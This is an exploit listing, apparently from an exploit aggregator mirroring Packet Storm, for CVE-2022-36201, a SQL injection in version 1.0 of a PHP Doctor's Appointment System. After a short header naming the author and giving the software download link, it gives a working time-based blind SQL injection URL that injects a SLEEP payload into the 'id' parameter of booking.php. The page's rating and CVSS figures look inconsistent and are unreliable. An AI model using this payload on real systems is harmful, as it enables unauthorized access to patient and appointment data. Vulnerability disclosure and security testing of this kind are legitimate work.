Exploit for Doctor's Appointment System 1.0 SQL Injection CVE-2022-36201

Name: Exploit for Doctor's Appointment System 1.0 SQL Injection CVE-2022-36201
Rating: 5 (210 reviews)

2022-09-01 | CVSS 0.3

## https://sploitus.com/exploit?id=PACKETSTORM:168212
# Exploit Title: SQLi - Doctor's Appointment System v1.0  
# Google Dork: N/A  
# Date: 7/13/2022  
# Exploit Author: Abdullah Zaid - @_aznull  
# Vendor Homepage:  
https://www.sourcecodester.com/hashenudara/simple-doctors-appointment-project.html  
# Software Link:  
https://www.sourcecodester.com/sites/default/files/download/hshnudr/edoc-doctor-appointment-system-main_1.zip  
# Version: 1.0  
# Tested on: Linux  
# CVE : CVE-2022-36201  
  
  
POC:  
  
http://localhost/edoc/patient/booking.php?id=1%20AND%20(SELECT%203436%20FROM%20(SELECT(SLEEP(10)))dZls)